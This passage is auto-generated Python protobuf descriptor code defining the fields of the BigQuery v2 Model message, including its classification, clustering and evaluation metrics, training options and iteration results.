type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1872,
serialized_end=2364,
)
_MODEL_BINARYCLASSIFICATIONMETRICS = _descriptor.Descriptor(
name="BinaryClassificationMetrics",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="aggregate_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.aggregate_classification_metrics",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="binary_confusion_matrix_list",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.binary_confusion_matrix_list",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="positive_label",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.positive_label",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="negative_label",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.negative_label",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1565,
serialized_end=2364,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY = _descriptor.Descriptor(
name="Entry",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="predicted_label",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry.predicted_label",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="item_count",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry.item_count",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2799,
serialized_end=2880,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW = _descriptor.Descriptor(
name="Row",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="actual_label",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row.actual_label",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="entries",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row.entries",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2883,
serialized_end=3014,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX = _descriptor.Descriptor(
name="ConfusionMatrix",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="confidence_threshold",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.confidence_threshold",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="rows",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.rows",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY,
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2621,
serialized_end=3014,
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS = _descriptor.Descriptor(
name="MultiClassClassificationMetrics",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="aggregate_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.aggregate_classification_metrics",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="confusion_matrix_list",
full_name="google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.confusion_matrix_list",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2367,
serialized_end=3014,
)
_MODEL_CLUSTERINGMETRICS = _descriptor.Descriptor(
name="ClusteringMetrics",
full_name="google.cloud.bigquery.v2.Model.ClusteringMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="davies_bouldin_index",
full_name="google.cloud.bigquery.v2.Model.ClusteringMetrics.davies_bouldin_index",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean_squared_distance",
full_name="google.cloud.bigquery.v2.Model.ClusteringMetrics.mean_squared_distance",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3017,
serialized_end=3157,
)
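# EvaluationMetrics wraps the per-model-type metric messages in a single
# "metrics" oneof (see the OneofDescriptor in its oneofs list below).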
_MODEL_EVALUATIONMETRICS = _descriptor.Descriptor(
name="EvaluationMetrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="regression_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.regression_metrics",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="binary_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.binary_classification_metrics",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="multi_class_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.multi_class_classification_metrics",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="clustering_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.clustering_metrics",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.metrics",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=3160,
serialized_end=3565,
)
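# LabelClassWeightsEntry is the synthesized map-entry message for
# TrainingOptions.label_class_weights; serialized_options b"8\001" sets the
# map_entry option on the entry type.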
_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY = _descriptor.Descriptor(
name="LabelClassWeightsEntry",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry.value",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4853,
serialized_end=4909,
)
_MODEL_TRAININGRUN_TRAININGOPTIONS = _descriptor.Descriptor(
name="TrainingOptions",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="max_iterations",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.max_iterations",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="loss_type",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.loss_type",
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="learn_rate",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.learn_rate",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="l1_regularization",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.l1_regularization",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="l2_regularization",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.l2_regularization",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="min_relative_progress",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.min_relative_progress",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="warm_start",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.warm_start",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="early_stop",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.early_stop",
index=7,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="input_label_columns",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.input_label_columns",
index=8,
number=9,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="data_split_method",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.data_split_method",
index=9,
number=10,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="data_split_eval_fraction",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.data_split_eval_fraction",
index=10,
number=11,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="data_split_column",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.data_split_column",
index=11,
number=12,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="learn_rate_strategy",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.learn_rate_strategy",
index=12,
number=13,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="initial_learn_rate",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.initial_learn_rate",
index=13,
number=16,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="label_class_weights",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.label_class_weights",
index=14,
number=17,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="distance_type",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.distance_type",
index=15,
number=20,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="num_clusters",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.num_clusters",
index=16,
number=21,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_uri",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.model_uri",
index=17,
number=22,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="optimization_strategy",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.optimization_strategy",
index=18,
number=23,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3876,
serialized_end=4909,
)
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO = _descriptor.Descriptor(
name="ClusterInfo",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="centroid_id",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo.centroid_id",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="cluster_radius",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo.cluster_radius",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="cluster_size",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo.cluster_size",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=5244,
serialized_end=5383,
)
_MODEL_TRAININGRUN_ITERATIONRESULT = _descriptor.Descriptor(
name="IterationResult",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="index",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.index",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="duration_ms",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.duration_ms",
index=1,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="training_loss",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.training_loss",
index=2,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="eval_loss",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.eval_loss",
index=3,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="learn_rate",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.learn_rate",
index=4,
number=7,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="cluster_infos",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.cluster_infos",
index=5,
number=8,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4912,
serialized_end=5383,
)
_MODEL_TRAININGRUN = _descriptor.Descriptor(
name="TrainingRun",
full_name="google.cloud.bigquery.v2.Model.TrainingRun",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="training_options",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.training_options",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="start_time",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.start_time",
index=1,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="results",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.results",
index=2,
number=6,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="evaluation_metrics",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.evaluation_metrics",
index=3,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_MODEL_TRAININGRUN_TRAININGOPTIONS,
_MODEL_TRAININGRUN_ITERATIONRESULT,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3568,
serialized_end=5383,
)
_MODEL_LABELSENTRY = _descriptor.Descriptor(
name="LabelsEntry",
full_name="google.cloud.bigquery.v2.Model.LabelsEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.cloud.bigquery.v2.Model.LabelsEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.cloud.bigquery.v2.Model.LabelsEntry.value",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=5385,
serialized_end=5430,
)
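# Top-level descriptor for the Model message itself; its nested_types and
# enum_types lists tie the nested descriptors defined above back to it.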
_MODEL = _descriptor.Descriptor(
name="Model",
full_name="google.cloud.bigquery.v2.Model",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="etag",
full_name="google.cloud.bigquery.v2.Model.etag",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_reference",
full_name="google.cloud.bigquery.v2.Model.model_reference",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="creation_time",
full_name="google.cloud.bigquery.v2.Model.creation_time",
index=2,
number=5,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="last_modified_time",
full_name="google.cloud.bigquery.v2.Model.last_modified_time",
index=3,
number=6,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="description",
full_name="google.cloud.bigquery.v2.Model.description",
index=4,
number=12,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="friendly_name",
full_name="google.cloud.bigquery.v2.Model.friendly_name",
index=5,
number=14,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="labels",
full_name="google.cloud.bigquery.v2.Model.labels",
index=6,
number=15,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="expiration_time",
full_name="google.cloud.bigquery.v2.Model.expiration_time",
index=7,
number=16,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location",
full_name="google.cloud.bigquery.v2.Model.location",
index=8,
number=13,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_type",
full_name="google.cloud.bigquery.v2.Model.model_type",
index=9,
number=7,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
